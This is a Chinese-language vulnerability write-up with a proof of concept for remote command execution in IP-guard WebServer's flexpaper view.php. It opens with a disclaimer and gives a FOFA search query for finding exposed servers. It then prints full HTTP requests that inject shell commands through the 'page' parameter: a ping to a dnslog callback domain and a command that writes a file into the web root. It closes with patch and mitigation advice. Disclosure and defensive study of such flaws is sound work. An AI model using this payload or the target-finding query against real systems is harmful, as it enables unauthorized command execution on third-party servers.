IP-guard flexpaper RCE漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

在数字化时代，医药企业在信息化进程中不可避免地面临着日益增长的数据资产威胁。为了确保其关键信息资产的安全性、机密性和可用性，医药企业日益倚重于先进的信息安全解决方案。其中，备受瞩目的IP-guard产品在医药领域展现出强大的技术力量，为企业提供了全方位的信息安全保障。

IP-guard作为专业的信息安全管理和数据防泄漏解决方案，为企业的关键数据资产提供强有力的保护。其在各行各业都备受欢迎，尤其在医药领域，其价值更是凸显。

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。

0x03 影响版本

IP-guard WebServer version < 4.81.0307.0

0x04 漏洞环境

FOFA语法： “IP-guard”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20ahmgjkzddv.dgrh3.cn HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

3.复现

1.发送数据包，使用ping命令以及dnslog查看回显

ping域名执行成功！！！
2.进一步尝试写入文件

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo%2012345678%20>test.txt

拼接访问路径：http://ip:port/ipg/static/appr/lib/flexpaper/php/test.txt

0x06 修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.ip-guard.net/
https://github.com/MD-SEC/MDPOCS/blob/main/Ip_Guard_Webserver_View_Rce_Poc.py

临时方案：

1.使用安全防护类设备对相关资产进行防护。
2.避免将IP-guard WebServer暴露在互联网，通过白名单访问。
3.在确认不影响业务的情况下，可以直接删除存在漏洞的文件。